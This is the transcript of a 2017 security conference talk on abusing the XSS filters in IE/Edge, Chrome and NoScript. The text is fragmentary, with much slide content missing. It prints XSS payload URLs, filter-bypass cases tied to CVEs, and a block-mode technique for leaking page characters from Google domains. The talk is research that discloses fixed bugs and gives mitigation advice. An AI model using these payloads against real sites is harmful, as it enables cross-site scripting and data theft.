$30 off During Our Annual Pro Sale. View Details »

USAGE OF XSS FILTER

USAGE OF XSS FILTER

English version of my presentation in Shibuya.XSS techtalk #9.
Japanese version is here: https://speakerdeck.com/masatokinugawa/shibuya-dot-xss-techtalk-number-9

Masato Kinugawa

April 25, 2017
Tweet

More Decks by Masato Kinugawa

Other Decks in Technology

Transcript

  1. View Slide

  2. View Slide





  3. Agenda

    View Slide

  4. View Slide

  5. XSS Filter?
    https://example.com/?q=">


    ">



    View Slide

  6. XSS Filter?
    https://example.com/?q=">


    ">



    View Slide

  7. Support
    https://addons.mozilla.org/ja/firefox/addon/noscript/

    View Slide

  8. How to Control
    HTTP/1.1 200 OK
    Date: Tue, 28 Mar 2017 06:16:00 GMT
    Expires: -1
    Cache-Control: private, max-age=0
    Content-Type: text/html; charset=UTF-8
    Server: gws
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: SAMEORIGIN

    View Slide

  9. X-XSS-Protection

    View Slide

  10. X-XSS-Protection

    View Slide

  11. How to control NoScript
    X-XSS-Protection

    View Slide

  12. Basic Behavior
    https://example.com/?q=">
    https://example.com/#5382863726995448701


    ">
    ">

    View Slide

  13. Behavior of block mode

    View Slide

  14. Filter Mechanism of IE/Edge
    ">


    https://example.com/?q=">

    View Slide

  15. Filter Mechanism of XSS Auditor
    ">


    https://example.com/?q=">

    View Slide

  16. Filter Mechanism of NoScript
    https://example.com/?q=">
    https://example.com/#5382863726995448701


    View Slide

  17. False Positives and Filter
    <script> - Google Search
    (function(){window.google={kEI: [...]<br/>https://www.google.co.jp/search?q=<script><br/><br/>

    View Slide

  18. Filter's Risk

    <br/>if(jQuery){<br/>// Expected<br/>}else{<br/>// ???<br/>}<br/>
    https://example.com/?

    View Slide

  19. ABUSING
    FILTER's
    Replacement
    Mode

    View Slide

  20. {{[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}}
    [...]
    {(v|(?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(b|(?0
    *((66)|(42)|(98)|(62));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(?0*((83)|(53)
    |(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*((c|(?0*((67)|(43)|(99)|(63)
    );?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(?0*((82)|(52)|(114)|(72));?))([\t]|
    (&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9
    |(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)|
    A|D);?)|(tab;)|(newline;))))*(t|(?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(ta
    b;)|(newline;))))*)?(:|(&((#x?0*((58)|(3A));?)|(colon;)))).}
    {{}
    {{[...]
    {{[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.}
    {[...]
    Filter Regex of IE/Edge
    ">

    View Slide

  21. Why "> happens
    [ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.
    ">

    View Slide

  22. Why "> happens
    ">
    [\"\'][ ]*(([^a-z0-
    9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee]))
    )).+?{\(}.*?{\)}
    x="";alert(1)//"

    View Slide

  23. XSS using XSS filter means:

    View Slide

  24. Past Discoveries
    https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU-
    2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf
    http://d.hatena.ne.jp/teracc/20090622

    View Slide

  25. 2015: Rediscoveries
    https://www.slideshare.net/masatokinugawa/xxn-en

    View Slide

  26. XXN Example
    [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in))
    .+?[.].+?=
    <br/>q = "";document#body.innerHTML="<xss>";<br/>
    URL: ?q=";document.body.innerHTML="

    View Slide

  27. XXN Example
    [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in))
    .+?[.].+?=
    <br/><script src="//example.co.jp/test.js"<br/>type="text/javascript"><br/>
    URL: ?"/++.+++=

    View Slide

  28. Mitigation for these attacks
    mode=block
    "style=:\
    javascript:-
    vbscript:-
    vbs:-
    ",x[]=
    "{toString:
    "{valueOf:
    mode=block

    View Slide

  29. Strange fix
    type="text/javascript">

    View Slide

  30. ^ is Safe?
    window#name// The execution is aborted by the syntax error
    window^name// valid syntax, it is executed as JavaScript
    window.name <br/>

    View Slide

  31. View Slide

  32. XXN using caret
    (CVE-2016-3212)
    url=location.search.slice(1);
    if(url^indexOf(":")!=-1){
    url=null;
    }
    onload=function(){
    if(url){location=url;}
    }

    View Slide

  33. ES6 and XXN
    https://example.com/?q=";alert`1`//

    <br/>q = "";alert`1`//";<br/>
    https://www.slideshare.net/x00mario/es6-en/34
    ECMAScript 6 from an Attacker's Perspective
    - Breaking Frameworks, Sandboxes, and everything else(by Mario Heiderich)

    View Slide

  34. XXN using back-tick characters
    (CVE-2016-7280)
    https://example.com/?q=${alert(1)}``//&`+++`

    https://example.com/?q=[USER_INPUT]

    <br/>foo=``;<br/>q="[USER_INPUT]";<br/>
    <br/>foo=`#;<br/>q="${alert(1)}#`//";<br/>

    View Slide

  35. Now, the replacement behavior is safe?
    https://example.com/?+onfiles+++=.

    type="text/javascript">

    [...]

    View Slide

  36. Future replacement mode
    https://bugs.chromium.org/p/chromium/issues/detail?id=654794

    View Slide

  37. ABUSING
    FILTER's
    Block Mode

    View Slide

  38. Past found bugs in block mode
    http://blog.portswigger.net/2015/08/abusing-chromes-xss-auditor-to-steal.html
    window.length

    View Slide

  39. Getting the filter state
    https://VICTIM/
    https://VICTIM/?

    IFRAME ERROR
    https://ATTACKER/

    win=window.open(…) if(win.length == 0){
    //when filter works,
    //the number of frames is "0"
    }else{
    //normal
    }

    View Slide

  40. Mitigations in IE/Edge





    View Slide

  41. Abusing block mode in Google
    https://www.youtube.com/watch?v=IMDWjKFbsJE

    View Slide

  42. Checking Google's Homepage
    HTTP/1.1 200 OK
    [...]
    Server: gws
    X-XSS-Protection: 1; mode=block
    X-Frame-Options: SAMEORIGIN


    window.length

    View Slide

  43. Special Conditions(1)
    https://accounts.google.com/ServiceLogin?

    View Slide

  44. Special Conditions(2)
    google.ae
    google.as
    google.ca
    google.co
    google.co.in
    google.co.jp
    google.co.kr
    google.co.nz
    google.co.uk
    google.com.br
    google.com.mx
    google.de
    google.es
    google.fr
    google.it
    google.pl
    google.pt
    google.ru
    ...(

    View Slide


  45. Bypassing attempts limitation


    View Slide

  46. Another important thing
    {

    View Slide

  47. Investigating filter details
    0
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    https://example.com/

    View Slide

  48. Investigating filter details
    0
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    https://example.com/?

    View Slide

  49. Investigating filter details
    0
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    https://example.com/?

    View Slide

  50. 0x01-08 0x0E-1F
    !"$%'()*;=^`|~
    0x09-0D 0x20 +
    &
    >
    #,/:?[\]{}
    -.@_
    A a
    0x00
    0-9 <
    B-Z b-z
    No reaction
    Result

    View Slide

  51. Result
    0x01-08 0x0E-1F
    !"$%'()*;=^`|~
    0x09-0D 0x20 +
    &
    >
    #,/:?[\]{}
    -.@_
    A a
    0x00
    0-9 <
    B-Z b-z
    No reaction

    View Slide

  52. The Target
    [email protected]
    {[\"\'`][ ]*(([^a-z0-9~_:\'\"` ])|(in)).+?{[.]}.+?=}

    View Slide

  53. Check Conditions




    View Slide

  54. Organizing URL for attacks
    [email protected]

    View Slide

  55. Getting the number of characters
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=
    https://www.google.co.jp/?"[email protected]=

    View Slide

  56. Getting the characters
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.de/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=

    View Slide

  57. https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ru/?"[email protected]=
    https://www.google.ca/?"[email protected]=
    ...
    Getting the characters

    View Slide




  58. View Slide

  59. After the fix

    View Slide

  60. Microsoft's Fix

    View Slide

  61. PROPER
    USAGE of
    XSS FILTER

    View Slide

  62. Recommendation
    of X-XSS-Protection

    View Slide

  63. 0 is dangerous?



    View Slide

  64. How should we do?

    X-XSS-
    Protection





    View Slide

  65. At the last: Rewards






    View Slide

  66. View Slide